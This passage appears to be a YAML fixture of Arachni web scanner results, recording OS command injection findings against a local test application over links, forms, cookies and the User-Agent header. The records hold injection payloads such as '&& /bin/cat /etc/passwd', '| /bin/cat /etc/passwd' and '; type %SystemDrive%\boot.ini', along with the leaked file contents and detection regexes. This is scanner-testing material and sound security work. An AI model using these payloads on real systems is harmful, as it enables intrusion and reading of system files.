'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/unix/link/append?input=default elem: link method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' /bin/cat /etc/passwd' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default /bin/cat /etc/passwd :follow_location: true :injected: default /bin/cat /etc/passwd :combo: !binary "aW5wdXQ=": default /bin/cat /etc/passwd :action: http://localhost:12305/unix/link/append?input=default :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: input url: http://localhost:12305/unix/link/append?input=default injected: default /bin/cat /etc/passwd id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: link remarks: {} method: GET response: ! 
'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/unix/link/straight?input=default elem: link method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '&& /bin/cat /etc/passwd' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd' :follow_location: true :injected: ! '&& /bin/cat /etc/passwd' :combo: !binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd' :action: http://localhost:12305/unix/link/straight?input=default :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: input url: http://localhost:12305/unix/link/straight?input=default injected: ! '&& /bin/cat /etc/passwd' id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: link remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie2 url: http://localhost:12305/unix/cookie/append elem: cookie method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '` /bin/cat /etc/passwd`' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value` /bin/cat /etc/passwd` :injected: cookie value` /bin/cat /etc/passwd` :combo: !binary "Y29va2llMg==": cookie value` /bin/cat /etc/passwd` :action: http://localhost:12305/unix/cookie/append :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: cookie2 url: http://localhost:12305/unix/cookie/append injected: cookie value` /bin/cat /etc/passwd` id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: cookie remarks: {} method: GET response: ! 
'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value`+/bin/cat+/etc/passwd`;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:12305/unix/cookie/straight elem: cookie method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '| /bin/cat /etc/passwd' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! '| /bin/cat /etc/passwd' :injected: ! '| /bin/cat /etc/passwd' :combo: !binary "Y29va2ll": ! '| /bin/cat /etc/passwd' :action: http://localhost:12305/unix/cookie/straight :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: cookie url: http://localhost:12305/unix/cookie/straight injected: ! '| /bin/cat /etc/passwd' id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: cookie remarks: {} method: GET response: ! 
'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=|+/bin/cat+/etc/passwd response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:12305/unix/header/straight elem: header method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '&& /bin/cat /etc/passwd' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& /bin/cat /etc/passwd' :injected: ! '&& /bin/cat /etc/passwd' :combo: User-Agent: ! '&& /bin/cat /etc/passwd' :action: http://localhost:12305/unix/header/straight :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: User-Agent url: http://localhost:12305/unix/header/straight injected: ! '&& /bin/cat /etc/passwd' id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: header remarks: :stuff: - Blah - Blah2 method: GET response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
'&& /bin/cat /etc/passwd' Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:12305/unix/header/append elem: header method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' /bin/cat /etc/passwd' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user /bin/cat /etc/passwd :injected: arachni_user /bin/cat /etc/passwd :combo: User-Agent: arachni_user /bin/cat /etc/passwd :action: http://localhost:12305/unix/header/append :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: User-Agent url: http://localhost:12305/unix/header/append injected: arachni_user /bin/cat /etc/passwd id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: header remarks: {} method: GET response: ! 
'["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user /bin/cat /etc/passwd Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/windows/form/straight elem: form method: POST name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' type %SystemDrive%\\boot.ini' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' type %SystemDrive%\\boot.ini' :follow_location: true :injected: ! ' type %SystemDrive%\\boot.ini' :combo: !binary "aW5wdXQ=": ! ' type %SystemDrive%\\boot.ini' :action: http://localhost:12305/windows/form/straight :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: input url: http://localhost:12305/windows/form/straight injected: ! ' type %SystemDrive%\\boot.ini' id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: form remarks: {} method: POST response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/windows/form/append elem: form method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '&& type %SystemDrive%\\boot.ini' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default&& type %SystemDrive%\\boot.ini :follow_location: true :injected: default&& type %SystemDrive%\\boot.ini :combo: !binary "aW5wdXQ=": default&& type %SystemDrive%\\boot.ini :action: http://localhost:12305/windows/form/append :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: input url: http://localhost:12305/windows/form/append injected: default&& type %SystemDrive%\\boot.ini id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: form remarks: {} method: GET response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/windows/link/straight?input=default elem: link method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ; type %SystemDrive%\\boot.ini :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ; type %SystemDrive%\\boot.ini :follow_location: true :injected: ; type %SystemDrive%\\boot.ini :combo: !binary "aW5wdXQ=": ; type %SystemDrive%\\boot.ini :action: http://localhost:12305/windows/link/straight?input=default :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: input url: http://localhost:12305/windows/link/straight?input=default injected: ; type %SystemDrive%\\boot.ini id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: link remarks: {} method: GET response: ! 
